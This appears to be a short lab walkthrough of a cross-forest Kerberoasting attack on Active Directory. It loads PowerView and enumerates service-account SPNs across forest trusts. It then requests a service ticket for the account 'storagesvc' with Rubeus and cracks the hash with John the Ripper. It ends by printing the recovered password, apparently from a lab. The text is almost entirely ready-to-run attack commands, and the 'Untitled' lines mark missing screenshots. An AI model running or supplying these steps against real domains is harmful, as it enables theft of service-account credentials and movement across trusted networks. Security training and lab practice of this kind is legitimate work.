We will learn how to exploit cross-forest Kerberoasting attack

Loading PowerView

 . .\\PowerView.ps1

Untitled

Now let’s Find Kerberoastable users across the forest

Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName} | select samaccountname,serviceprincipalname

Untitled

Notice that we got the user storagesvc is Kerberoastable

Now using Rubeus.exe to get TGS

.\\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:crosskerberoast.txt

Untitled

As observed we got the hash of the user

Now cracking it with john

.\\john.exe ..\\..\\crosskerberoast.txt --wordlist=..\\..\\kerberoast\\10k-worst-pass.txt

Untitled

and we got the password

username: storagesvc
password: Qwerty@123